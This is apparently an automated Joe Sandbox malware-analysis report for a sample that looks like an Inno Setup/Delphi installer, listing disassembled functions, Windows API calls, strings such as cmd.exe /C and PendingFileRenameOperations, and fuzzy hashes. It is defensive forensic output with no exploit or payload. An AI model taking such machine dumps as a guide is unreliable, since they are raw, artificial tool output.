                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$ptI$shell32.dll$shfolder.dll
                                                                              • API String ID: 190572456-2576699960
                                                                              • Opcode ID: de0f38486c819f413c08132c2c10785360ce7bb1d082894e1dd7e5610f115569
                                                                              • Instruction ID: 1b7f257eac351b2865de88edbb479a2ab4f4c09eb1d5ad9e3bfc9d6f8503b50a
                                                                              • Opcode Fuzzy Hash: de0f38486c819f413c08132c2c10785360ce7bb1d082894e1dd7e5610f115569
                                                                              • Instruction Fuzzy Hash: 66310E70A001099BCB00EB95D5D2AEEB7B5EB44305F50847BE404F7241D778AE45CBAD

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2126 40631c-406336 GetModuleHandleA GetProcAddress 2127 406338 2126->2127 2128 40633f-40634c GetProcAddress 2126->2128 2127->2128 2129 406355-406362 GetProcAddress 2128->2129 2130 40634e 2128->2130 2131 406364-406366 SetProcessDEPPolicy 2129->2131 2132 406368-406369 2129->2132 2130->2129 2131->2132
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498730), ref: 00406322
                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498730), ref: 00406366
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModulePolicyProcess
                                                                              • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                              • API String ID: 3256987805-3653653586
                                                                              • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                              • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                              • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                              • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                              APIs
                                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                              • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                              • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow$Prop
                                                                              • String ID: 3A$yA
                                                                              • API String ID: 3887896539-3278460822
                                                                              • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                              • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                              • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                              • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2265 42f560-42f56a 2266 42f574-42f5b1 call 402b30 GetActiveWindow GetFocus call 41eea4 2265->2266 2267 42f56c-42f56f call 402d30 2265->2267 2273 42f5c3-42f5cb 2266->2273 2274 42f5b3-42f5bd RegisterClassA 2266->2274 2267->2266 2275 42f652-42f66e SetFocus call 403400 2273->2275 2276 42f5d1-42f602 CreateWindowExA 2273->2276 2274->2273 2276->2275 2278 42f604-42f648 call 42427c call 403738 CreateWindowExA 2276->2278 2278->2275 2284 42f64a-42f64d ShowWindow 2278->2284 2284->2275
                                                                              APIs
                                                                              • GetActiveWindow.USER32 ref: 0042F58F
                                                                              • GetFocus.USER32 ref: 0042F597
                                                                              • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                              • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                              • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                              • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                              • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,004581A2,00000000,0049B628), ref: 0042F654
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                              • String ID: TWindowDisabler-Window
                                                                              • API String ID: 3167913817-1824977358
                                                                              • Opcode ID: af2d58cb1d61aa5294d5b80584b5773ea49d3efeec85bd27a4eae10aec25b275
                                                                              • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                              • Opcode Fuzzy Hash: af2d58cb1d61aa5294d5b80584b5773ea49d3efeec85bd27a4eae10aec25b275
                                                                              • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2285 4531f0-453241 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 2286 453243-45324a 2285->2286 2287 45324c-45324e 2285->2287 2286->2287 2288 453250 2286->2288 2289 453252-453288 call 42e394 call 42e8c8 call 403400 2287->2289 2288->2289
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498776), ref: 00453210
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498776), ref: 0045322A
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                              • API String ID: 1646373207-2130885113
                                                                              • Opcode ID: 460e23cb00cf3424ad6d0c49a1f828097ca48bff1b05d8589e040c86aeca4b16
                                                                              • Instruction ID: 0cfad7ca53bf4133c716031d63a26ec494c9be7874946ed143d2344feace3e75
                                                                              • Opcode Fuzzy Hash: 460e23cb00cf3424ad6d0c49a1f828097ca48bff1b05d8589e040c86aeca4b16
                                                                              • Instruction Fuzzy Hash: 9F01D870240B04BED3016F63AD12F563A58E755B5BF5044BBFC1496582C77C4A088EAD
                                                                              APIs
                                                                              • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467097
                                                                              • ExtractIconA.SHELL32(00400000,00000000,?), ref: 004670BD
                                                                                • Part of subcall function 00466F34: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466FCC
                                                                                • Part of subcall function 00466F34: DestroyCursor.USER32(00000000), ref: 00466FE2
                                                                              • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00467114
                                                                              • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467175
                                                                              • ExtractIconA.SHELL32(00400000,00000000,?), ref: 0046719B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                              • String ID: c:\directory$shell32.dll
                                                                              • API String ID: 3376378930-1375355148
                                                                              • Opcode ID: 6d041171d1007e38f1423e999fca6c8345fae3a72a3914b9ee39d1bb44a6fd6f
                                                                              • Instruction ID: 28e44f0b0ade20fd2fa41990bb26b25d2b6273e6e4b8387af8825f96a0abaac4
                                                                              • Opcode Fuzzy Hash: 6d041171d1007e38f1423e999fca6c8345fae3a72a3914b9ee39d1bb44a6fd6f
                                                                              • Instruction Fuzzy Hash: 65517E70604204AFD710DF65CD89FDFB7E8EB49308F1081A7F8089B351D6389E81CA69
                                                                              APIs
                                                                              • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                              • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                              • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                              • API String ID: 4130936913-2943970505
                                                                              • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                              • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                              • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                              • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                              APIs
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00472199,?,00000000,?,0049C1DC,00000000,00472389,?,00000000,?,00000000,?,00472555), ref: 00472175
                                                                              • FindClose.KERNEL32(000000FF,004721A0,00472199,?,00000000,?,0049C1DC,00000000,00472389,?,00000000,?,00000000,?,00472555,?), ref: 00472193
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,004722BB,?,00000000,?,0049C1DC,00000000,00472389,?,00000000,?,00000000,?,00472555), ref: 00472297
                                                                              • FindClose.KERNEL32(000000FF,004722C2,004722BB,?,00000000,?,0049C1DC,00000000,00472389,?,00000000,?,00000000,?,00472555,?), ref: 004722B5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileNext
                                                                              • String ID: &&G$&&G
                                                                              • API String ID: 2066263336-852616326
                                                                              • Opcode ID: 53d573c3283eea8276722ae00e783839c534cad26cf1d76589be1e10efaeed4f
                                                                              • Instruction ID: 5d8f9e8498e1fb85c1a49ff99105bc28d4ff0fd985b73b461b66a4ef7da0b053
                                                                              • Opcode Fuzzy Hash: 53d573c3283eea8276722ae00e783839c534cad26cf1d76589be1e10efaeed4f
                                                                              • Instruction Fuzzy Hash: F0C14C3490424D9FCF11DFA5C981BDEBBB9FF09304F5085AAE908A3291D7789A45CF64
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                              • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                              • API String ID: 854858120-615399546
                                                                              • Opcode ID: d48cb867d8132222f58630969ce6cc8153310e3eaa120555069058459d823a95
                                                                              • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                              • Opcode Fuzzy Hash: d48cb867d8132222f58630969ce6cc8153310e3eaa120555069058459d823a95
                                                                              • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                                              APIs
                                                                              • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                              • OemToCharA.USER32(?,?), ref: 0042375C
                                                                              • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Char$FileIconLoadLowerModuleName
                                                                              • String ID: 2$MAINICON
                                                                              • API String ID: 3935243913-3181700818
                                                                              • Opcode ID: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
                                                                              • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                                              • Opcode Fuzzy Hash: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
                                                                              • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                                • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                                • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                              • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                              • API String ID: 316262546-2767913252
                                                                              • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                              • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                              • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                              • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                              APIs
                                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                              • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                              • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                              • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow$Prop
                                                                              • String ID:
                                                                              • API String ID: 3887896539-0
                                                                              • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                              • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                              • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                              • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                              Strings
                                                                              • WININIT.INI, xrefs: 004557E4
                                                                              • PendingFileRenameOperations2, xrefs: 00455784
                                                                              • PendingFileRenameOperations, xrefs: 00455754
                                                                              • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
